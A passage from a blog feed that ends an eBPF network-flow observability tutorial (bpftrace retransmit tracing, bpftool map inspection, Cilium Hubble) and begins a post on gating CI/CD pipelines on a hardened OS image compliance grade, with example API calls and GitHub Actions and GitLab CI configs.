<p>The TCP stack underneath those requests handles retransmits, congestion window adjustments, RST packets, and half-open connections silently. From an application&#8217;s perspective, a request that required 3 retransmits before the ACK arrived looks identical to one that succeeded on the first attempt — slightly slower, but successful.</p>
<p>This is structural, not a tooling gap. Application-layer observability tools cannot see below their own protocol boundary. The kernel&#8217;s TCP implementation does not report upward when it retransmits. It just retransmits.</p>
<p>eBPF flow observability closes this gap by attaching programs directly to the network path — at the TC hook, which fires on every packet crossing a network interface — and recording what the kernel actually does.</p>
<hr />
<h2 id="how-tc-hook-flow-programs-work">How TC Hook Flow Programs Work</h2>
<p>EP08 covered TC eBPF programs for pod network policy. Flow observability uses the same attachment point with a different purpose: instead of allowing or dropping packets, the program reads packet metadata and writes it to a map or ring buffer.</p>
<pre><code class="" data-line="">Pod sends packet
      ↓
veth interface (lxcXXXX)
      ↓
TC clsact/egress hook fires
      ↓
eBPF program reads:
  - src IP, dst IP
  - src port, dst port
  - protocol
  - packet size
  - TCP flags (SYN, ACK, FIN, RST, retransmit bit)
      ↓
Writes event to ringbuf (or perf_event_array)
      ↓
Userspace consumer reads ringbuf
      ↓
Aggregates to flow record
      ↓
Exports to Hubble/Prometheus/flow store
</code></pre>
<blockquote>
<p><strong><code class="" data-line="">ringbuf</code></strong> — a BPF ring buffer: a lock-free, memory-efficient queue shared between a kernel eBPF program and a userspace consumer. The kernel program writes events; the userspace reader drains them. Used instead of <code class="" data-line="">perf_event_array</code> in kernel 5.8+ because it avoids per-CPU memory waste and supports variable-length records. When you see Hubble exporting flows, it&#8217;s reading from a ringbuf that the TC program writes to.</p>
</blockquote>
<p>The key structural property: the TC hook fires on every packet. Not sampled. Not throttled by default. Every SYN, every ACK, every RST, every retransmit. For flow observability, you typically aggregate at the program level — count packets and bytes per 5-tuple per second, rather than emitting an event per packet — but the raw visibility is there if you need it.</p>
<hr />
<h2 id="what-retransmit-telemetry-actually-reveals">What Retransmit Telemetry Actually Reveals</h2>
<p>Most flow observability implementations track TCP retransmits specifically because they are the clearest signal of network-layer trouble invisible to applications.</p>
<p>A TCP retransmit happens when a sender doesn&#8217;t receive an ACK within the retransmission timeout (RTO). The kernel resends the segment and doubles the timeout (exponential backoff). From the application&#8217;s perspective, the call takes longer. If retransmits keep clearing, the application sees success — just slow success.</p>
<blockquote>
<p><strong><code class="" data-line="">perf_event</code></strong> — a kernel mechanism for collecting performance data. In eBPF, <code class="" data-line="">BPF_MAP_TYPE_PERF_EVENT_ARRAY</code> lets kernel programs push variable-length records to userspace readers via a ring buffer per CPU. Older tools use <code class="" data-line="">perf_event_array</code>; newer ones use <code class="" data-line="">BPF_MAP_TYPE_RINGBUF</code> (single shared ring, more efficient). If you inspect an older version of Cilium&#8217;s flow exporter, you&#8217;ll see <code class="" data-line="">perf_event</code> writes; newer versions use <code class="" data-line="">ringbuf</code>.</p>
</blockquote>
<p>To observe retransmits directly with bpftrace:</p>
<pre><code class="" data-line=""># Count retransmit events per destination IP — run for 60 seconds
bpftrace -e &#039;
kprobe:tcp_retransmit_skb {
    $sk = (struct sock *)arg0;
    $daddr = ntop(AF_INET, $sk-&gt;__sk_common.skc_daddr);
    @retransmits[$daddr] = count();
}
interval:s:60 { print(@retransmits); clear(@retransmits); exit(); }
&#039;
</code></pre>
<p>Sample output:</p>
<pre><code class="" data-line="">Attaching 2 probes...
@retransmits[10.96.0.10]:   2       # DNS service — normal
@retransmits[172.16.4.23]:  847     # payment gateway endpoint ← problem here
@retransmits[10.244.1.5]:   1       # normal pod-to-pod traffic
</code></pre>
<p>847 retransmits to a single endpoint in 60 seconds. That&#8217;s not noise. That&#8217;s a congested or half-open connection being retried 14 times per second by the TCP stack while the application layer averages it into &#8220;elevated latency.&#8221;</p>
<hr />
<h2 id="how-cilium-hubble-collects-flow-data">How Cilium Hubble Collects Flow Data</h2>
<p>Hubble is the flow observability layer built into Cilium. Understanding how it works makes you able to reason about what it can and cannot see — and how to verify what it&#8217;s actually collecting.</p>
<p>Hubble&#8217;s architecture:</p>
<pre><code class="" data-line="">Kernel (per node)
├── TC eBPF programs on all pod veth interfaces
│     write flow events → BPF ringbuf
│
└── Hubble node agent (userspace)
      reads ringbuf
      enriches with pod metadata (Kubernetes API)
      exposes gRPC API

Cluster level
└── Hubble Relay
      aggregates per-node gRPC streams
      exposes single cluster-wide API

User tooling
└── hubble observe  /  Hubble UI  /  Prometheus exporter
</code></pre>
<p>The TC programs are writing raw packet events. The Hubble agent is the consumer that translates those events into Kubernetes-aware flow records — adding pod name, namespace, label, and policy verdict on top of the 5-tuple and TCP metadata the kernel provides.</p>
<p>To see what Hubble&#8217;s TC programs have attached:</p>
<pre><code class="" data-line=""># On any Cilium node
bpftool net list | grep lxc

# lxce4a1(23) clsact/ingress prog_id 61  ← Hubble flow program on pod interface ingress
# lxce4a1(23) clsact/egress  prog_id 62  ← Hubble flow program on pod interface egress
# lxcf7b2(31) clsact/ingress prog_id 63
# lxcf7b2(31) clsact/egress  prog_id 64
</code></pre>
<pre><code class="" data-line=""># Inspect one of those programs to confirm it&#039;s reading flow metadata
bpftool prog show id 61

# Output:
# 61: sched_cls  name tail_handle_nat  tag 3a8e2f1b4c7d9e0a  gpl
#     loaded_at 2026-04-22T09:13:45+0530  uid 0
#     xlated 2144B  jited 1382B  memlock 4096B  map_ids 24,31,38
#     btf_id 142
</code></pre>
<p><code class="" data-line="">sched_cls</code> is the BPF program type for TC — confirming these are TC-attached flow programs. <code class="" data-line="">map_ids 24,31,38</code> — those are the maps this program reads from and writes to. You can dump any of them:</p>
<pre><code class="" data-line="">bpftool map dump id 24 | head -40

# Output (connection tracking entry):
# [{
#     &quot;key&quot;: {
#         &quot;saddr&quot;: &quot;10.244.1.5&quot;,        # ← source pod IP
#         &quot;daddr&quot;: &quot;172.16.4.23&quot;,        # ← destination IP
#         &quot;sport&quot;: 48291,                # ← source port
#         &quot;dport&quot;: 443,                  # ← destination port
#         &quot;nexthdr&quot;: 6,                  # ← protocol: TCP
#         &quot;flags&quot;: 3                     # ← CT_EGRESS | CT_ESTABLISHED
#     },
#     &quot;value&quot;: {
#         &quot;rx_packets&quot;: 14832,           # ← packets received
#         &quot;tx_packets&quot;: 14831,           # ← packets sent
#         &quot;rx_bytes&quot;: 3841024,           # ← bytes received
#         &quot;tx_bytes&quot;: 3756288,           # ← bytes sent
#         &quot;lifetime&quot;: 21600,             # ← seconds until entry expires
#         &quot;rx_closing&quot;: 0,
#         &quot;tx_closing&quot;: 0
#     }
# }]
</code></pre>
<p>That&#8217;s the ground truth. Not an APM span. Not a service mesh metric. The actual per-connection counters the kernel is maintaining for that 5-tuple.</p>
<hr />
<h2 id="writing-a-minimal-flow-observer-with-bpftrace">Writing a Minimal Flow Observer with bpftrace</h2>
<p>You don&#8217;t need Cilium or Hubble to get flow telemetry. bpftrace can produce it directly on any node with BTF:</p>
<pre><code class="" data-line=""># Persistent flow table: connections + packet counts for 2 minutes
bpftrace -e &#039;
kprobe:tcp_sendmsg {
    $sk = (struct sock *)arg0;
    $daddr = ntop(AF_INET, $sk-&gt;__sk_common.skc_daddr);
    $dport = $sk-&gt;__sk_common.skc_dport &gt;&gt; 8;
    @flows[comm, $daddr, $dport] = count();
}
interval:s:30 { print(@flows); clear(@flows); }
&#039; --timeout 120
</code></pre>
<p>Sample output (every 30 seconds):</p>
<pre><code class="" data-line="">@flows[curl, 93.184.216.34, 443]:         12    # curl → example.com:443
@flows[coredns, 10.96.0.10, 53]:          341   # CoreDNS upstream queries
@flows[payment-svc, 172.16.4.23, 443]:   1204   # payment service → gateway
@flows[nginx, 10.244.2.3, 8080]:          89    # nginx → upstream pod
</code></pre>
<p>For retransmit tracking specifically:</p>
<pre><code class="" data-line=""># Combined flow + retransmit watcher — runs until Ctrl-C
bpftrace -e &#039;
kprobe:tcp_retransmit_skb {
    $sk = (struct sock *)arg0;
    $daddr = ntop(AF_INET, $sk-&gt;__sk_common.skc_daddr);
    @retx[comm, $daddr] = count();
}
kprobe:tcp_sendmsg {
    $sk = (struct sock *)arg0;
    $daddr = ntop(AF_INET, $sk-&gt;__sk_common.skc_daddr);
    @sends[comm, $daddr] = count();
}
interval:s:10 {
    printf(&quot;=== Retransmit ratio (last 10s) ===\n&quot;);
    print(@retx);
    print(@sends);
    clear(@retx);
    clear(@sends);
}
&#039;
</code></pre>
<p>This gives you both the volume of sends and the retransmit count side by side — the ratio tells you whether retransmits are a rounding error (0.01%) or a signal (5%+).</p>
<hr />
<h2 id="production-gotchas"><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/26a0.png" alt="⚠" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Production Gotchas</h2>
<p><strong>Map size bounds matter.</strong> Connection tracking maps default to tens of thousands of entries. On nodes with high connection churn (serverless, short-lived batch jobs), maps can fill and start dropping new entries silently. Check <code class="" data-line="">bpftool map show id N</code> for <code class="" data-line="">max_entries</code> and monitor map utilization. Cilium exposes this as <code class="" data-line="">cilium_bpf_map_pressure</code> in Prometheus.</p>
<p><strong>Per-packet overhead on high-throughput interfaces.</strong> A TC program that fires on every packet on a 10Gbps interface processes millions of packets per second. Aggregating at the program level (count per 5-tuple rather than emit per packet) keeps overhead manageable — Cilium does this. A naive bpftrace one-liner that emits a perf event per packet will saturate the perf ring buffer under real load. Use <code class="" data-line="">ringbuf</code> write paths or aggregate before emitting.</p>
<p><strong>TC hook placement and direction confusion.</strong> Ingress TC on a pod&#8217;s veth (lxcXXXX) sees egress traffic from the pod&#8217;s perspective — because the host sees the packet arriving on the veth after the pod sent it. This reversal is consistent but confusing when you&#8217;re reading direction labels in flow records. EP08 covered this in detail for policy enforcement; the same asymmetry applies to flow data.</p>
<p><strong>Retransmit counters reset on connection close.</strong> If you&#8217;re tracking retransmit totals for a long-lived connection, the count is stored in the kernel&#8217;s socket state and is cleared when the socket closes. For persistent tracking across reconnects, aggregate at the flow level in userspace before the connection closes.</p>
<p><strong>Hubble flow visibility requires pod interfaces.</strong> Hubble only sees traffic that crosses a pod&#8217;s veth interface. Node-to-node traffic that doesn&#8217;t involve a pod (e.g., node SSH, kubelet-to-API-server on the node IP) is not captured by default. For host-level network observability, you need a TC program on the physical interface (<code class="" data-line="">eth0</code>, <code class="" data-line="">ens3</code>), not just on pod veth pairs.</p>
<hr />
<h2 id="quick-reference">Quick Reference</h2>
<table>
<thead>
<tr>
<th>What you want to see</th>
<th>Command</th>
</tr>
</thead>
<tbody>
<tr>
<td>What TC programs are attached</td>
<td><code class="" data-line="">bpftool net list</code></td>
</tr>
<tr>
<td>Which maps a program uses</td>
<td><code class="" data-line="">bpftool prog show id N</code> (check <code class="" data-line="">map_ids</code>)</td>
</tr>
<tr>
<td>Connection tracking entries</td>
<td><code class="" data-line="">bpftool map dump id N</code></td>
</tr>
<tr>
<td>Retransmits per destination</td>
<td><code class="" data-line="">bpftrace -e &#039;kprobe:tcp_retransmit_skb { ... }&#039;</code></td>
</tr>
<tr>
<td>Flow counts per process</td>
<td><code class="" data-line="">bpftrace -e &#039;kprobe:tcp_sendmsg { @[comm, daddr] = count(); }&#039;</code></td>
</tr>
<tr>
<td>Hubble flow stream (Cilium)</td>
<td><code class="" data-line="">hubble observe --follow</code></td>
</tr>
<tr>
<td>Hubble flows for one pod</td>
<td><code class="" data-line="">hubble observe --pod mynamespace/mypod --follow</code></td>
</tr>
<tr>
<td>Verify map pressure</td>
<td><code class="" data-line="">bpftool map show id N</code> (check <code class="" data-line="">max_entries</code> vs entries)</td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>Kernel function</th>
<th>What it marks</th>
</tr>
</thead>
<tbody>
<tr>
<td><code class="" data-line="">tcp_sendmsg</code></td>
<td>Data being sent on a TCP socket</td>
</tr>
<tr>
<td><code class="" data-line="">tcp_recvmsg</code></td>
<td>Data being received on a TCP socket</td>
</tr>
<tr>
<td><code class="" data-line="">tcp_retransmit_skb</code></td>
<td>A segment being retransmitted</td>
</tr>
<tr>
<td><code class="" data-line="">tcp_send_reset</code></td>
<td>RST being sent</td>
</tr>
<tr>
<td><code class="" data-line="">tcp_fin</code></td>
<td>Connection teardown initiated</td>
</tr>
<tr>
<td><code class="" data-line="">tcp_connect</code></td>
<td>New outbound TCP connection attempt</td>
</tr>
</tbody>
</table>
<hr />
<h2 id="key-takeaways">Key Takeaways</h2>
<ul>
<li>Network flow observability with eBPF attaches TC programs that record every connection event continuously — not sampled, not throttled, not filtered by what the application reports</li>
<li>Retransmit telemetry from <code class="" data-line="">tcp_retransmit_skb</code> reveals congestion and endpoint failures that are structurally invisible to application-layer monitoring tools</li>
<li>Cilium Hubble, Pixie, and Retina are all eBPF flow exporters — they run TC programs, drain a ringbuf, enrich with Kubernetes metadata, and expose the result over an API</li>
<li>You can verify what any flow tool is actually collecting with <code class="" data-line="">bpftool net list</code>, <code class="" data-line="">bpftool prog show</code>, and <code class="" data-line="">bpftool map dump</code> — four commands, no documentation needed</li>
<li>Map sizing and per-packet overhead are the two production concerns; aggregate at the kernel level, bound your maps, and monitor map pressure</li>
<li>The kernel&#8217;s connection tracking map is the ground truth. APM dashboards, service mesh metrics, and load balancer health checks are all interpretations of what that map contains</li>
</ul>
<hr />
<h2 id="whats-next">What&#8217;s Next</h2>
<p>Flow observability tells you what connections exist. EP11 goes one level deeper: what names your pods are resolving those connections to. DNS is where a compromised workload first reveals itself — it queries a domain that has no business being queried from a production pod, and if you&#8217;re not watching the kernel-level DNS path, you won&#8217;t see it until after the damage.</p>
<p>DNS observability at the kernel level uses tracepoint hooks on the DNS syscall path — the same ground-truth approach as flow telemetry, but for name resolution: every query, every response, tied to the pod that made it, without deploying a sidecar.</p>
<p><em>Next: <a href="/dns-kernel-observability/">DNS observability at the kernel level — what your pods are actually resolving</a></em></p>
<p>Get EP11 in your inbox when it publishes → <a href="https://linuxcent.com/subscribe">linuxcent.com/subscribe</a></p>
<p><a class="a2a_button_mastodon" href="https://www.addtoany.com/add_to/mastodon?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-network-flow-observability%2F&amp;linkname=Network%20Flow%20Observability%20%E2%80%94%20What%20Every%20Connection%20Reveals" title="Mastodon" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-network-flow-observability%2F&amp;linkname=Network%20Flow%20Observability%20%E2%80%94%20What%20Every%20Connection%20Reveals" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-network-flow-observability%2F&amp;linkname=Network%20Flow%20Observability%20%E2%80%94%20What%20Every%20Connection%20Reveals" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-network-flow-observability%2F&amp;linkname=Network%20Flow%20Observability%20%E2%80%94%20What%20Every%20Connection%20Reveals" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-network-flow-observability%2F&amp;linkname=Network%20Flow%20Observability%20%E2%80%94%20What%20Every%20Connection%20Reveals" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-network-flow-observability%2F&amp;linkname=Network%20Flow%20Observability%20%E2%80%94%20What%20Every%20Connection%20Reveals" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_copy_link" href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-network-flow-observability%2F&amp;linkname=Network%20Flow%20Observability%20%E2%80%94%20What%20Every%20Connection%20Reveals" title="Copy Link" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share#url=https%3A%2F%2Flinuxcent.com%2Febpf-network-flow-observability%2F&#038;title=Network%20Flow%20Observability%20%E2%80%94%20What%20Every%20Connection%20Reveals" data-a2a-url="https://linuxcent.com/ebpf-network-flow-observability/" data-a2a-title="Network Flow Observability — What Every Connection Reveals"></a></p><p>The post <a href="https://linuxcent.com/ebpf-network-flow-observability/">Network Flow Observability — What Every Connection Reveals</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://linuxcent.com/ebpf-network-flow-observability/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1838</post-id>	</item>
		<item>
		<title>The Pipeline Gate — Hardened Images as a CI/CD Build Constraint</title>
		<link>https://linuxcent.com/hardened-image-cicd-pipeline-gate/</link>
					<comments>https://linuxcent.com/hardened-image-cicd-pipeline-gate/#respond</comments>
		
		<dc:creator><![CDATA[Vamshi Krishna Santhapuri]]></dc:creator>
		<pubDate>Sat, 23 May 2026 02:00:00 +0000</pubDate>
				<category><![CDATA[OS Image Builder]]></category>
		<category><![CDATA[CI/CD]]></category>
		<category><![CDATA[DevSecOps]]></category>
		<category><![CDATA[GitOps]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Pipeline]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Stratum]]></category>
		<guid isPermaLink="false">https://linuxcent.com/?p=1831</guid>

					<description><![CDATA[<p><span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 6</span> <span class="rt-label rt-postfix">minutes</span></span>Make hardened OS images a CI/CD build constraint: POST /api/pipeline/scan fails the build if grade < threshold. Unhardened images never reach production.
</p>
<p>The post <a href="https://linuxcent.com/hardened-image-cicd-pipeline-gate/">The Pipeline Gate — Hardened Images as a CI/CD Build Constraint</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></description>
										<content:encoded><![CDATA[<span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 6</span> <span class="rt-label rt-postfix">minutes</span></span><style>
pre{position:relative;background:#1e1e1e;color:#d4d4d4;
    padding:16px 16px 16px 20px;border-radius:6px;overflow-x:auto;
    font-family:'JetBrains Mono','Fira Code','Cascadia Code',Consolas,'Courier New',monospace;
    font-size:.88em;line-height:1.6;border-left:4px solid #555}
code{background:#f4f4f4;padding:2px 5px;border-radius:3px;font-size:.9em}
pre code{background:transparent;padding:0;color:inherit}
pre[data-lang="bash"],pre[data-lang="sh"],
pre[data-lang="shell"],pre[data-lang="zsh"]{border-left-color:#4ec9b0}
pre[data-lang="yaml"],pre[data-lang="json"],
pre[data-lang="toml"],pre[data-lang="xml"]{border-left-color:#569cd6}
pre[data-lang="python"],pre[data-lang="go"],pre[data-lang="rust"],
pre[data-lang="java"],pre[data-lang="c"],pre[data-lang="cpp"]{border-left-color:#c586c0}
pre[data-lang="text"],pre[data-lang="output"],
pre[data-lang="console"]{border-left-color:#888}
.lc-copy-btn{position:absolute;top:8px;right:8px;background:#2d2d2d;color:#ccc;
    border:1px solid #444;border-radius:4px;padding:3px 9px;font-size:.75em;
    font-family:system-ui,sans-serif;cursor:pointer;opacity:0;
    transition:opacity .15s,background .15s;line-height:1.6}
pre:hover .lc-copy-btn{opacity:1}
.lc-copy-btn:hover{background:#3a3a3a;color:#fff}
.lc-copy-btn.copied{color:#4ec9b0;border-color:#4ec9b0}
.lc-lang-badge{position:absolute;top:8px;left:20px;font-family:system-ui,sans-serif;
    font-size:.7em;color:#666;text-transform:uppercase;letter-spacing:.04em;
    line-height:1;pointer-events:none;opacity:0;transition:opacity .15s}
pre:hover .lc-lang-badge{opacity:1}
table{border-collapse:collapse;width:100%;margin:16px 0}
th,td{border:1px solid #ddd;padding:10px 14px;text-align:left}
th{background:#f0f0f0;font-weight:600}
tr:nth-child(even){background:#fafafa}
</style>
<p><script>
(function(){
  if(window.__lcCodeEnhanced)return;
  window.__lcCodeEnhanced=true;
  function enhance(){
    document.querySelectorAll('pre').forEach(function(pre){
      var code=pre.querySelector('code');
      var lang='';
      if(code){var m=(code.className||'').match(/language-(\S+)/);if(m)lang=m[1].toLowerCase();}
      if(lang)pre.setAttribute('data-lang',lang);
      if(lang){var badge=document.createElement('span');badge.className='lc-lang-badge';badge.textContent=lang;pre.insertBefore(badge,pre.firstChild);}
      var btn=document.createElement('button');
      btn.className='lc-copy-btn';btn.textContent='Copy';btn.setAttribute('aria-label','Copy code to clipboard');
      pre.appendChild(btn);
      btn.addEventListener('click',function(){
        var text=code?code.innerText:pre.innerText;
        if(navigator.clipboard&&window.isSecureContext){
          navigator.clipboard.writeText(text).then(function(){ok(btn);}).catch(function(){fb(text,btn);});
        }else{fb(text,btn);}
      });
    });
  }
  function ok(btn){btn.textContent='Copied!';btn.classList.add('copied');setTimeout(function(){btn.textContent='Copy';btn.classList.remove('copied');},2000);}
  function fb(text,btn){
    try{var ta=document.createElement('textarea');ta.value=text;ta.style.cssText='position:fixed;left:-9999px;top:-9999px;opacity:0';document.body.appendChild(ta);ta.select();document.execCommand('copy');document.body.removeChild(ta);ok(btn);}
    catch(e){btn.textContent='✗ Failed';setTimeout(function(){btn.textContent='Copy';},2000);}
  }
  if(document.readyState==='loading'){document.addEventListener('DOMContentLoaded',enhance);}else{enhance();}
})();
</script></p>
<p><em>OS Hardening as Code, Episode 5</em><br />
<em><a href="https://linuxcent.com/cloud-ami-security-risks-custom-os-images/">Cloud AMI Security Risks</a> · <a href="/linux-hardening-as-code-yaml-blueprint/">Linux Hardening as Code</a> · <a href="/linux-hardening-multi-cloud/">Multi-Cloud OS Hardening</a> · <a href="/automated-openscap-compliance-cis/">Automated OpenSCAP Compliance</a> · </em><em>CI/CD Compliance Gate</em>**</p>
<hr />
<h2 id="tldr">TL;DR</h2>
<ul>
<li>A CI/CD compliance gate turns an OS hardening grade from a report into a build constraint — unhardened images fail the pipeline before they can be deployed</li>
<li><code class="" data-line="">POST /api/pipeline/scan</code> returns pass/fail against a minimum grade threshold — integrates into any CI/CD system that can make an HTTP request</li>
<li>Failed gate output tells engineers exactly which controls failed and what to fix — not just &#8220;blocked&#8221;</li>
<li>The gate works on both build-time grades (new images) and runtime grades (existing instances)</li>
<li>GitHub Actions, GitLab CI, Jenkins, and Tekton integrations are one curl command</li>
<li>The structural guarantee: an image that doesn&#8217;t pass the gate doesn&#8217;t exist in the deployment pipeline</li>
</ul>
<hr />
<h2 id="the-problem-a-grade-no-one-checks-is-decoration">The Problem: A Grade No One Checks Is Decoration</h2>
<pre><code class="" data-line="">Pipeline without compliance gate:
  Build → Test → Security scan (results to dashboard) → Deploy

What actually happens:
  Build → Test → Security scan → &quot;C grade, but we need to ship&quot; → Deploy anyway
                                           │
                                           └─ Dashboard shows C grade
                                              Nobody is paged
                                              Deployment succeeds
</code></pre>
<p>A CI/CD compliance gate means the pipeline can&#8217;t continue if the grade is below threshold.</p>
<p>EP04 showed that automated OpenSCAP compliance gives every image a verified, reproducible grade before deployment. What it assumed is that someone checks the grade before deploying. They don&#8217;t — not under deadline pressure, not when the image has been &#8220;working fine for months,&#8221; not at 2am.</p>
<p>The same problem that made hardening runbooks skippable applies to compliance grades: if checking the grade is a discretionary step, it will be skipped.</p>
<hr />
<p>A new microservice was deployed from an unhardened base image. The team had built it quickly during a sprint, used a community AMI as the base, and planned to harden it &#8220;in the next sprint.&#8221;</p>
<p>Three weeks later, a penetration test found it. SSH password authentication enabled. Three unnecessary services running — one of them with a known CVE. The finding: the instance had full inbound access from the VPC and was reachable from a compromised adjacent instance.</p>
<p>The deployment had gone through the normal CI/CD pipeline. Unit tests passed. Integration tests passed. A vulnerability scan ran. The scan produced a report that went to a dashboard. Nobody had a gate set up to fail the build if the image was unhardened.</p>
<p>The hardening work from the &#8220;next sprint&#8221; plan would have taken four hours. The pentest remediation took a week, plus the time to investigate what had been exposed during the three weeks the instance was running.</p>
<p>The CI/CD pipeline had every check except the one that would have caught the base image problem before the first deployment.</p>
<hr />
<h2 id="the-pipeline-api">The Pipeline API</h2>
<p>The Pipeline API is a single HTTP endpoint that takes an image or instance ID, checks it against a minimum grade, and returns pass or fail:</p>
<pre><code class="" data-line=""># Fail the pipeline if the image grade is below B
curl -sf -X POST https://stratum.yourdomain.com/api/pipeline/scan \
  -H &quot;Authorization: Bearer ${STRATUM_TOKEN}&quot; \
  -H &quot;Content-Type: application/json&quot; \
  -d &#039;{
    &quot;image_id&quot;: &quot;ami-0a7f3c9e82d1b4c05&quot;,
    &quot;min_grade&quot;: &quot;B&quot;
  }&#039;

# Pass response (grade A):
# HTTP 200
# {
#   &quot;result&quot;: &quot;pass&quot;,
#   &quot;image_id&quot;: &quot;ami-0a7f3c9e82d1b4c05&quot;,
#   &quot;grade&quot;: &quot;A&quot;,
#   &quot;score&quot;: 94,
#   &quot;controls_passing&quot;: 94,
#   &quot;controls_total&quot;: 100,
#   &quot;scanned_at&quot;: &quot;2026-04-19T15:54:10Z&quot;
# }

# Fail response (grade C):
# HTTP 422
# {
#   &quot;result&quot;: &quot;fail&quot;,
#   &quot;image_id&quot;: &quot;ami-0c9d5e3f81a2b6e07&quot;,
#   &quot;grade&quot;: &quot;C&quot;,
#   &quot;score&quot;: 72,
#   &quot;min_grade_required&quot;: &quot;B&quot;,
#   &quot;failing_controls&quot;: [
#     { &quot;id&quot;: &quot;1.1.7&quot;, &quot;title&quot;: &quot;Separate partition for /var/log/audit&quot;, &quot;severity&quot;: &quot;medium&quot; },
#     { &quot;id&quot;: &quot;3.3.2&quot;, &quot;title&quot;: &quot;TCP SYN cookies enabled&quot;, &quot;severity&quot;: &quot;low&quot; },
#     ...
#   ]
# }
</code></pre>
<p>A non-200 response fails the pipeline. The <code class="" data-line="">|| exit 1</code> in the shell integration handles this — if the API returns 422, the pipeline step exits non-zero and the job fails.</p>
<hr />
<h2 id="github-actions-integration">GitHub Actions Integration</h2>
<pre><code class="" data-line=""># .github/workflows/deploy.yml

jobs:
  build-image:
    runs-on: ubuntu-latest
    outputs:
      ami_id: ${{ steps.build.outputs.ami_id }}
    steps:
      - name: Build hardened AMI
        id: build
        run: |
          AMI_ID=$(stratum build \
            --blueprint ubuntu22-cis-l1.yaml \
            --provider aws \
            --output json | jq -r &#039;.image_id&#039;)
          echo &quot;ami_id=${AMI_ID}&quot; &gt;&gt; $GITHUB_OUTPUT

  compliance-gate:
    runs-on: ubuntu-latest
    needs: build-image
    steps:
      - name: Stratum compliance gate
        run: |
          curl -sf -X POST ${{ vars.STRATUM_URL }}/api/pipeline/scan \
            -H &quot;Authorization: Bearer ${{ secrets.STRATUM_TOKEN }}&quot; \
            -H &quot;Content-Type: application/json&quot; \
            -d &quot;{\&quot;image_id\&quot;: \&quot;${{ needs.build-image.outputs.ami_id }}\&quot;, \&quot;min_grade\&quot;: \&quot;B\&quot;}&quot; \
            || { echo &quot;Compliance gate failed — image does not meet minimum grade B&quot;; exit 1; }

  deploy:
    runs-on: ubuntu-latest
    needs: [build-image, compliance-gate]
    steps:
      - name: Deploy to staging
        run: |
          aws autoscaling update-auto-scaling-group \
            --auto-scaling-group-name my-asg \
            --launch-template &quot;ImageId=${{ needs.build-image.outputs.ami_id }}&quot;
</code></pre>
<p>The <code class="" data-line="">deploy</code> job only runs if <code class="" data-line="">compliance-gate</code> passes. The AMI doesn&#8217;t reach the autoscaling group if it doesn&#8217;t meet the grade threshold.</p>
<hr />
<h2 id="gitlab-ci-integration">GitLab CI Integration</h2>
<pre><code class="" data-line=""># .gitlab-ci.yml

stages:
  - build
  - compliance
  - deploy

build-image:
  stage: build
  script:
    - |
      AMI_ID=$(stratum build \
        --blueprint ubuntu22-cis-l1.yaml \
        --provider aws \
        --output json | jq -r &#039;.image_id&#039;)
      echo &quot;AMI_ID=${AMI_ID}&quot; &gt;&gt; build.env
  artifacts:
    reports:
      dotenv: build.env

compliance-gate:
  stage: compliance
  needs: [build-image]
  script:
    - |
      curl -sf -X POST ${STRATUM_URL}/api/pipeline/scan \
        -H &quot;Authorization: Bearer ${STRATUM_TOKEN}&quot; \
        -H &quot;Content-Type: application/json&quot; \
        -d &quot;{\&quot;image_id\&quot;: \&quot;${AMI_ID}\&quot;, \&quot;min_grade\&quot;: \&quot;B\&quot;}&quot;

deploy:
  stage: deploy
  needs: [build-image, compliance-gate]
  script:
    - ./deploy.sh ${AMI_ID}
</code></pre>
<hr />
<h2 id="what-the-failed-gate-tells-you">What the Failed Gate Tells You</h2>
<p>The value of the CI/CD compliance gate is not just that it blocks bad images — it&#8217;s that the failure output tells engineers what to fix.</p>
<p>A gate failure in CI shows:</p>
<pre><code class="" data-line="">Compliance gate failed.

Image: ami-0c9d5e3f81a2b6e07
Grade: C (72/100)
Required: B (85/100)
Gap: 13 controls failing

Failing controls:
  HIGH   1.1.7   Separate partition for /var/log/audit
                 Fix: Provision /var/log/audit on a separate EBS volume
  MEDIUM 1.6.1.3 AppArmor enabled in bootloader
                 Fix: Update GRUB_CMDLINE_LINUX, run update-grub, reboot
  MEDIUM 3.3.2   TCP SYN cookies
                 Fix: echo &quot;net.ipv4.tcp_syncookies=1&quot; &gt; /etc/sysctl.d/60-cis.conf
  LOW    5.2.21  SSH MaxStartups
                 Fix: Add &quot;MaxStartups 10:30:60&quot; to /etc/ssh/sshd_config
  ...

View full scan report: https://stratum.yourdomain.com/scans/ami-0c9d5e3f81a2b6e07
</code></pre>
